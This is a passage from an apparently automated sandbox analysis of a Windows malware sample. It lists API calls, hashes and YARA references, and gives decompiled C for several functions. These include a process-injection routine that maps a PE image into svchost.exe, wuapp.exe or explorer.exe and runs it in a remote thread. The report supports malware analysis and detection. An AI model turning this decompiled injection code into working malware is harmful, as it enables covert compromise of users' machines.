                                                                                                        • LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FAA
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FBC
                                                                                                        • CoTaskMemFree.OLE32(00000000,0146AAE0), ref: 01467FEF
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01467FF6
                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 0146800C
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,0146461E,C:\ProgramData\LKBNMTFJgl,0146AAE0,00000023), ref: 01468029
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary$AddressProc$LoadTask
                                                                                                        • String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
                                                                                                        • API String ID: 2437428030-337183102
                                                                                                        • Opcode ID: ef5a7084ce8986e418b8a011375e90a43c32ac7a44b0f242faac332fbc5292ee
                                                                                                        • Instruction ID: d4a1681bb3c435a58ce5b6e251f13a7bf965bc1c80f8b538be91b43cd4db5ea6
                                                                                                        • Opcode Fuzzy Hash: ef5a7084ce8986e418b8a011375e90a43c32ac7a44b0f242faac332fbc5292ee
                                                                                                        • Instruction Fuzzy Hash: 7D018471680716BBEB315F55DC09B9E3BACEF08A4EF100055F904A51B0DBB596109797
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01466340, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 206memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 014663BC
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0146644C
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?), ref: 01466472
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014664C0
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014664F5
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01466591
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 014665BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$Free$File$AllocModuleNameSize
                                                                                                        • String ID: @
                                                                                                        • API String ID: 994213472-2766056989
                                                                                                        • Opcode ID: 19a38e2d253fba3960937bca2171791d9f313e262d37bd7ed5b8b31fbefbb15d
                                                                                                        • Instruction ID: 7c061aaa882431e2f244e42c127a9792d74d08c96cb4b32be6d65399450f16a3
                                                                                                        • Opcode Fuzzy Hash: 19a38e2d253fba3960937bca2171791d9f313e262d37bd7ed5b8b31fbefbb15d
                                                                                                        • Instruction Fuzzy Hash: 05714971A4021CABEF208F94DC49BEEBBB9FB09708F104116F604F6290DBB55A58CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014682B0, Relevance: 13.6, APIs: 9, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E014682B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E014615E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E01467AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E01461510();
								CloseHandle(_v8);
								return 0;
							} else {
								E01461510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}










                                                                                                        0x014682b9
                                                                                                        0x014682c3
                                                                                                        0x014682d9
                                                                                                        0x01468306
                                                                                                        0x0146830b
                                                                                                        0x014682db
                                                                                                        0x014682f0
                                                                                                        0x01468310
                                                                                                        0x01468315
                                                                                                        0x01468318
                                                                                                        0x0146832f
                                                                                                        0x0146833d
                                                                                                        0x00000000
                                                                                                        0x01468356
                                                                                                        0x0146835b
                                                                                                        0x01468360
                                                                                                        0x01468363
                                                                                                        0x01468366
                                                                                                        0x0146833e
                                                                                                        0x0146833e
                                                                                                        0x01468349
                                                                                                        0x01468355
                                                                                                        0x01468368
                                                                                                        0x01468368
                                                                                                        0x01468373
                                                                                                        0x01468382
                                                                                                        0x01468382
                                                                                                        0x01468366
                                                                                                        0x014682fd
                                                                                                        0x01468300
                                                                                                        0x00000000
                                                                                                        0x01468300
                                                                                                        0x014682f0

                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 014682CA
                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 014682D1
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 014682E8
                                                                                                        • GetLastError.KERNEL32 ref: 014682F2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468300
                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 01468327
                                                                                                        • IsValidSid.ADVAPI32(00000000), ref: 01468333
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468349
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 01468373
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                        • String ID:
                                                                                                        • API String ID: 2832165296-0
                                                                                                        • Opcode ID: 21072ad47593f493a1f7e7908610cdcdf3792f27a46439024d228e7a929b60e5
                                                                                                        • Instruction ID: 5b70a801a6609fe0088e9bf46ea261a0b618b63305ae77ed58505700ba2a257a
                                                                                                        • Opcode Fuzzy Hash: 21072ad47593f493a1f7e7908610cdcdf3792f27a46439024d228e7a929b60e5
                                                                                                        • Instruction Fuzzy Hash: 8F214C71900209FBEF215FA4ED09BDE7FADEF1464DF1000A6F905E1174EB728A609B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01463150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E01463150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x1631314 == 0) {
					if( *0x1631318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x1631318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E01461A00(_a4,  &_v524);
					E01461970(_a4, _t17);
					if(E01467ED0(_t20) != 0) {
						L11:
						return 1;
					} else {
						E01461A00(_t20,  &_v524);
						E01461970(_t20, _t18);
						_t16 = E01467ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}








                                                                                                        0x01463162
                                                                                                        0x01463180
                                                                                                        0x0146318e
                                                                                                        0x01463193
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01463164
                                                                                                        0x0146316b
                                                                                                        0x01463182
                                                                                                        0x01463182
                                                                                                        0x01463187
                                                                                                        0x0146316d
                                                                                                        0x0146316d
                                                                                                        0x01463172
                                                                                                        0x01463172
                                                                                                        0x0146316b
                                                                                                        0x014631a4
                                                                                                        0x014631ac
                                                                                                        0x01463215
                                                                                                        0x014631b5
                                                                                                        0x014631b6
                                                                                                        0x014631c1
                                                                                                        0x014631c8
                                                                                                        0x014631d8
                                                                                                        0x01463202
                                                                                                        0x0146320d
                                                                                                        0x014631da
                                                                                                        0x014631e2
                                                                                                        0x014631e9
                                                                                                        0x014631ef
                                                                                                        0x014631f9
                                                                                                        0x00000000
                                                                                                        0x014631fb
                                                                                                        0x01463201
                                                                                                        0x01463201
                                                                                                        0x014631f9
                                                                                                        0x014631d8

                                                                                                        APIs
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104,75144D40,00000000), ref: 014631A4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryWindows
                                                                                                        • String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
                                                                                                        • API String ID: 3619848164-3654143111
                                                                                                        • Opcode ID: dfbe7f1d752ff756bf023de64593195413a5d0a83ca3e00a9600bc4089f96190
                                                                                                        • Instruction ID: 0ba5d5e4795b6f5da91d4c8519fef068f2d2eed4542dc0bbf6e3ca9ca1fbf840
                                                                                                        • Opcode Fuzzy Hash: dfbe7f1d752ff756bf023de64593195413a5d0a83ca3e00a9600bc4089f96190
                                                                                                        • Instruction Fuzzy Hash: CB113A726013456BEB306A19EC44BEB736CEB5256DF04016BED0CC2231D7758E85C2E7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014629E0, Relevance: 10.8, APIs: 7, Instructions: 322threadsleepmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 17%
                                                                                                        			E014629E0(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16, DWORD* _a20, intOrPtr _a24) {
				CHAR* _v8;
				CHAR* _v12;
				void* _v16;
				long _v20;
				CHAR* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				long _v44;
				long _v48;
				long _v52;
				char _v56;
				long _v60;
				long _v64;
				long _v68;
				long _v72;
				long _v76;
				char _v80;
				void* _t112;
				void* _t115;
				CHAR* _t118;
				CHAR* _t119;
				CHAR* _t129;
				signed short _t132;
				CHAR* _t134;
				_Unknown_base(*)()* _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				CHAR* _t138;
				CHAR* _t141;
				CHAR* _t142;
				CHAR* _t147;
				void* _t149;
				CHAR* _t150;
				void* _t164;
				CHAR** _t165;
				void* _t168;
				void* _t170;
				struct HINSTANCE__* _t176;
				CHAR* _t177;
				signed int _t178;
				CHAR* _t180;
				signed int _t185;
				CHAR* _t188;
				_Unknown_base(*)()** _t190;
				intOrPtr _t192;
				CHAR* _t193;
				CHAR* _t195;
				intOrPtr* _t196;
				void* _t198;
				signed short* _t199;
				CHAR** _t201;
				char _t202;
				void* _t204;
				void* _t205;
				void* _t208;

				_t186 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_a20 = 0;
				_t196 =  *0x1631094(_a4);
				_v40 = _t196;
				if( *_t196 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 =  *((intOrPtr*)(_t196 + 0x50));
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t112 =  *0x1631098( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t112 != 0) {
						goto L5;
					} else {
						_t208 =  *0x1631314 - _t112; // 0x1
						if(_t208 == 0) {
							L6:
							_t115 =  *0x16310a8(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40);
							__eflags = _t115;
							if(_t115 != 0) {
								goto L4;
							} else {
								_t170 = VirtualAlloc(_t115, _v28, 0x3000, 0x40);
								__eflags = _t170;
								if(_t170 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x16310ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t118 = _v8;
									__eflags = _t118;
									if(_t118 != 0) {
										 *0x1631088(_t118);
										_t118 = _v8;
									}
									__eflags = _t170;
									if(_t170 != 0) {
										VirtualFree(_t170, 0, 0x8000);
										_t118 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x16310ac(_t118,  &_v24,  &_v20, 0x8000);
									}
									_t119 = _v16;
									__eflags = _t119;
									if(_t119 != 0) {
										 *0x1631088(_t119);
									}
									__eflags = 0;
									return 0;
								} else {
									E01461640(_t170, _t186, _v28);
									_t205 = _t204 + 0xc;
									_t188 =  *((intOrPtr*)(_t196 + 0x80)) + _t170;
									__eflags = _t188;
									while(1) {
										_t129 = _t188[0xc];
										_v32 = _t188;
										__eflags = _t129;
										if(_t129 != 0) {
											goto L11;
										}
										__eflags = _t188[4] - _t129;
										if(_t188[4] == _t129) {
											_t136 = _v40;
											_t177 = _v12;
											_t192 = _a4;
											_t45 = _t136 + 0xa0; // 0x45dd842a
											_t46 = _t136 + 0x34; // 0x0
											_t137 =  *_t46;
											_t201 =  *_t45 + _t170;
											_v40 = _t177 - _t137;
											__eflags =  *_t201;
											_v36 = _t192 - _t137;
											if( *_t201 != 0) {
												do {
													_t193 = _t201[1];
													_t50 =  &(_t201[1]); // 0x45dd842e
													_t165 = _t50;
													_v32 = _t165;
													__eflags = _t193 - 8;
													if(_t193 >= 8) {
														_t185 = 0;
														_t195 =  &(_t193[0xfffffffffffffff8]) >> 1;
														__eflags = _t195;
														if(_t195 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t178 =  *(_t201 + 8 + _t185 * 2) & 0x0000ffff;
																__eflags = _t178;
																if(_t178 != 0) {
																	_t180 =  &(( *_t201)[_t178 & 0x00000fff]);
																	_t57 =  &(_t180[_t170]);
																	 *_t57 = _t180[_t170] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t185 = _t185 + 1;
																__eflags = _t185 - _t195;
															} while (_t185 < _t195);
															_t165 = _v32;
														}
													}
													_t201 = _t201 +  *_t165;
													__eflags =  *_t201;
												} while ( *_t201 != 0);
												_t177 = _v12;
												_t192 = _a4;
											}
											_t138 =  *0x163109c(_v8, _t177, _t170, _v28, 0);
											__eflags = _t138;
											if(_t138 < 0) {
												goto L43;
											} else {
												_t202 = _a16;
												_t141 =  *0x16310a8(_v8,  &_v24, 0,  &_a16, 0x3000, 4);
												__eflags = _t141;
												if(_t141 != 0) {
													goto L43;
												} else {
													_t142 =  *0x163109c(_v8, _v24, _a12, _t202, _t141);
													__eflags = _t142;
													if(_t142 < 0) {
														goto L43;
													} else {
														_t147 =  *0x16310a0(_v8, 0, 0, 0, 0, 0, _v12 - _t192 + _a24, _v24,  &_v16, 0);
														__eflags = _t147;
														if(_t147 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t149 =  *0x16310a4(_v16, 0,  &_v48);
															__eflags = _t149 - 0x102;
															if(_t149 == 0x102) {
																while(1) {
																	__eflags =  *0x1632118;
																	if( *0x1632118 != 0) {
																		break;
																	}
																	Sleep(0xbb8);
																	_t164 =  *0x16310a4(_v16, 0,  &_v48);
																	__eflags = _t164 - 0x102;
																	if(_t164 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t150 = GetExitCodeThread(_v16, _a20);
															__eflags = _t150;
															if(_t150 == 0) {
																goto L43;
															} else {
																 *0x1631088(_v16);
																 *0x16310ac(_v8,  &_v12,  &_v20, 0x8000);
																 *0x1631088(_v8);
																VirtualFree(_t170, 0, 0x8000);
																_v20 = 0;
																 *0x16310ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t176 = E01468B00( &(_t129[_t170]));
										_t205 = _t205 + 4;
										_v36 = _t176;
										__eflags = _t176;
										if(_t176 == 0) {
											goto L43;
										} else {
											_t198 = _t170 +  *_t188;
											_t190 = _t170 + _t188[0x10];
											__eflags = _t198 - _t170;
											_t199 =  ==  ? _t190 : _t198;
											__eflags = _t199 - _t170;
											if(_t199 == _t170) {
												goto L43;
											} else {
												_t132 =  *_t199;
												__eflags = _t132;
												if(__eflags == 0) {
													L19:
													_t188 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t134 = _t132 + 2 + _t170;
														__eflags = _t134;
													} else {
														_t134 = _t132 & 0x0000ffff;
													}
													_t135 = GetProcAddress(_t176, _t134);
													 *_t190 = _t135;
													__eflags = _t135;
													if(_t135 == 0) {
														goto L43;
													}
													_t132 = _t199[2];
													_t199 =  &(_t199[2]);
													_t176 = _v36;
													_t190 = _t190 + 4;
													__eflags = _t132;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t168 = E01468270(__ecx, _v8);
							_t204 = _t204 + 4;
							if(_t168 != 0) {
								goto L6;
							} else {
								L4:
								 *0x1631088(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}




























































                                                                                                        0x014629eb
                                                                                                        0x014629ef
                                                                                                        0x014629f6
                                                                                                        0x014629fd
                                                                                                        0x01462a04
                                                                                                        0x01462a0b
                                                                                                        0x01462a12
                                                                                                        0x01462a19
                                                                                                        0x01462a20
                                                                                                        0x01462a27
                                                                                                        0x01462a33
                                                                                                        0x01462a35
                                                                                                        0x01462a3e
                                                                                                        0x01462ab9
                                                                                                        0x01462abf
                                                                                                        0x01462a40
                                                                                                        0x01462a43
                                                                                                        0x01462a49
                                                                                                        0x01462a53
                                                                                                        0x01462a63
                                                                                                        0x01462a6b
                                                                                                        0x01462a72
                                                                                                        0x01462a79
                                                                                                        0x01462a80
                                                                                                        0x01462a87
                                                                                                        0x01462a8e
                                                                                                        0x01462a96
                                                                                                        0x00000000
                                                                                                        0x01462a98
                                                                                                        0x01462a98
                                                                                                        0x01462a9e
                                                                                                        0x01462ac0
                                                                                                        0x01462ad4
                                                                                                        0x01462ada
                                                                                                        0x01462adc
                                                                                                        0x00000000
                                                                                                        0x01462ade
                                                                                                        0x01462af0
                                                                                                        0x01462af2
                                                                                                        0x01462af4
                                                                                                        0x01462d49
                                                                                                        0x01462d49
                                                                                                        0x01462d4d
                                                                                                        0x01462d5f
                                                                                                        0x01462d5f
                                                                                                        0x01462d65
                                                                                                        0x01462d68
                                                                                                        0x01462d6a
                                                                                                        0x01462d6d
                                                                                                        0x01462d73
                                                                                                        0x01462d73
                                                                                                        0x01462d76
                                                                                                        0x01462d78
                                                                                                        0x01462d82
                                                                                                        0x01462d88
                                                                                                        0x01462d88
                                                                                                        0x01462d8b
                                                                                                        0x01462d8f
                                                                                                        0x01462d96
                                                                                                        0x01462da6
                                                                                                        0x01462da6
                                                                                                        0x01462dac
                                                                                                        0x01462daf
                                                                                                        0x01462db1
                                                                                                        0x01462db4
                                                                                                        0x01462db4
                                                                                                        0x01462dbc
                                                                                                        0x01462dc2
                                                                                                        0x01462afa
                                                                                                        0x01462aff
                                                                                                        0x01462b0a
                                                                                                        0x01462b0d
                                                                                                        0x01462b0d
                                                                                                        0x01462b0f
                                                                                                        0x01462b0f
                                                                                                        0x01462b12
                                                                                                        0x01462b15
                                                                                                        0x01462b17
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b19
                                                                                                        0x01462b1c
                                                                                                        0x01462b88
                                                                                                        0x01462b8b
                                                                                                        0x01462b90
                                                                                                        0x01462b93
                                                                                                        0x01462b99
                                                                                                        0x01462b99
                                                                                                        0x01462b9c
                                                                                                        0x01462ba0
                                                                                                        0x01462ba7
                                                                                                        0x01462baa
                                                                                                        0x01462bad
                                                                                                        0x01462bb0
                                                                                                        0x01462bb0
                                                                                                        0x01462bb3
                                                                                                        0x01462bb3
                                                                                                        0x01462bb6
                                                                                                        0x01462bb9
                                                                                                        0x01462bbc
                                                                                                        0x01462bc1
                                                                                                        0x01462bc6
                                                                                                        0x01462bc6
                                                                                                        0x01462bc8
                                                                                                        0x01462bca
                                                                                                        0x01462bd0
                                                                                                        0x01462bd0
                                                                                                        0x01462bd5
                                                                                                        0x01462bd8
                                                                                                        0x01462be3
                                                                                                        0x01462be8
                                                                                                        0x01462be8
                                                                                                        0x01462be8
                                                                                                        0x01462be8
                                                                                                        0x01462beb
                                                                                                        0x01462bec
                                                                                                        0x01462bec
                                                                                                        0x01462bf0
                                                                                                        0x01462bf0
                                                                                                        0x01462bc8
                                                                                                        0x01462bf3
                                                                                                        0x01462bf5
                                                                                                        0x01462bf5
                                                                                                        0x01462bfa
                                                                                                        0x01462bfd
                                                                                                        0x01462bfd
                                                                                                        0x01462c0a
                                                                                                        0x01462c10
                                                                                                        0x01462c12
                                                                                                        0x00000000
                                                                                                        0x01462c18
                                                                                                        0x01462c18
                                                                                                        0x01462c2f
                                                                                                        0x01462c35
                                                                                                        0x01462c37
                                                                                                        0x00000000
                                                                                                        0x01462c3d
                                                                                                        0x01462c48
                                                                                                        0x01462c4e
                                                                                                        0x01462c50
                                                                                                        0x00000000
                                                                                                        0x01462c56
                                                                                                        0x01462c75
                                                                                                        0x01462c7b
                                                                                                        0x01462c7d
                                                                                                        0x00000000
                                                                                                        0x01462c83
                                                                                                        0x01462c86
                                                                                                        0x01462c8f
                                                                                                        0x01462c94
                                                                                                        0x01462c9a
                                                                                                        0x01462c9f
                                                                                                        0x01462ca7
                                                                                                        0x01462cac
                                                                                                        0x01462cae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462cb5
                                                                                                        0x01462cc0
                                                                                                        0x01462cc6
                                                                                                        0x01462ccb
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462ccd
                                                                                                        0x00000000
                                                                                                        0x01462ccb
                                                                                                        0x01462cd4
                                                                                                        0x01462cd4
                                                                                                        0x01462cda
                                                                                                        0x01462ce0
                                                                                                        0x01462ce6
                                                                                                        0x01462ce8
                                                                                                        0x00000000
                                                                                                        0x01462cea
                                                                                                        0x01462ced
                                                                                                        0x01462d03
                                                                                                        0x01462d0c
                                                                                                        0x01462d1a
                                                                                                        0x01462d28
                                                                                                        0x01462d37
                                                                                                        0x01462d48
                                                                                                        0x01462d48
                                                                                                        0x01462ce8
                                                                                                        0x01462c7d
                                                                                                        0x01462c50
                                                                                                        0x01462c37
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b1e
                                                                                                        0x01462b26
                                                                                                        0x01462b28
                                                                                                        0x01462b2b
                                                                                                        0x01462b2e
                                                                                                        0x01462b30
                                                                                                        0x00000000
                                                                                                        0x01462b36
                                                                                                        0x01462b3b
                                                                                                        0x01462b3d
                                                                                                        0x01462b3f
                                                                                                        0x01462b41
                                                                                                        0x01462b44
                                                                                                        0x01462b46
                                                                                                        0x00000000
                                                                                                        0x01462b4c
                                                                                                        0x01462b4c
                                                                                                        0x01462b4e
                                                                                                        0x01462b50
                                                                                                        0x01462b80
                                                                                                        0x01462b83
                                                                                                        0x00000000
                                                                                                        0x01462b52
                                                                                                        0x00000000
                                                                                                        0x01462b52
                                                                                                        0x01462b52
                                                                                                        0x01462b5c
                                                                                                        0x01462b5c
                                                                                                        0x01462b54
                                                                                                        0x01462b54
                                                                                                        0x01462b54
                                                                                                        0x01462b60
                                                                                                        0x01462b66
                                                                                                        0x01462b68
                                                                                                        0x01462b6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b70
                                                                                                        0x01462b73
                                                                                                        0x01462b76
                                                                                                        0x01462b79
                                                                                                        0x01462b7c
                                                                                                        0x01462b7e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01462b7e
                                                                                                        0x01462b50
                                                                                                        0x01462b46
                                                                                                        0x00000000
                                                                                                        0x01462b30
                                                                                                        0x01462b0f
                                                                                                        0x01462af4
                                                                                                        0x01462aa0
                                                                                                        0x01462aa3
                                                                                                        0x01462aa8
                                                                                                        0x01462aad
                                                                                                        0x00000000
                                                                                                        0x01462aaf
                                                                                                        0x01462aaf
                                                                                                        0x01462ab2
                                                                                                        0x00000000
                                                                                                        0x01462ab2
                                                                                                        0x01462aad
                                                                                                        0x01462a9e
                                                                                                        0x01462a96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 01462AEA
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 01462B60
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 01462CB5
                                                                                                        • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 01462CE0
                                                                                                          • Part of subcall function 01468270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,01463432), ref: 01468285
                                                                                                          • Part of subcall function 01468270: GetProcAddress.KERNEL32(00000000,?,?,01463432), ref: 0146828C
                                                                                                        • TerminateThread.KERNEL32(00000000,00000000), ref: 01462CD4
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01462D1A
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01462D82
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AddressFreeProcThread$AllocCodeExitHandleModuleSleepTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 844144628-0
                                                                                                        • Opcode ID: 87d78d6e66a0f30d14776295b6d6d1d168f788b11d39327d3cc5c0681a28b73f
                                                                                                        • Instruction ID: 60d6935ea7809c4826a2bd011aa9aa8f80072b78f07a614087ad7ff355d3e23a
                                                                                                        • Opcode Fuzzy Hash: 87d78d6e66a0f30d14776295b6d6d1d168f788b11d39327d3cc5c0681a28b73f
                                                                                                        • Instruction Fuzzy Hash: E1C13C71A00209FFEF20CF95DD45BEEBBB9FF04708F14402AE905A6260D7B19A55CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 014637E0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 127memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 01467ED0: GetFileAttributesW.KERNEL32(?,?,014631D3,014647C4,014647C4,\System32\wuapp.exe,014647C4,?,00000000), ref: 01467ED6
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 014638CD
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 01463900
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01463942
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 01463986
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$FileFree$AllocAttributesSize
                                                                                                        • String ID: 0125789244697858$@
                                                                                                        • API String ID: 1658238082-3353267005
                                                                                                        • Opcode ID: cd12c1d962eeb84e9d82e6debdbc54a55b4fa9356f5ccd4dcec29498180d6430
                                                                                                        • Instruction ID: ca07da6a91a0594dd6780e262b98e671488872ca60c8ca22bd9e0846b1adbaad
                                                                                                        • Opcode Fuzzy Hash: cd12c1d962eeb84e9d82e6debdbc54a55b4fa9356f5ccd4dcec29498180d6430
                                                                                                        • Instruction Fuzzy Hash: 4C414F70E40318ABFB208F94DD49BDEBBB8BB04719F104156F608B52D0DBB556188BA6
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 01468450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100sleepthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E01468450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
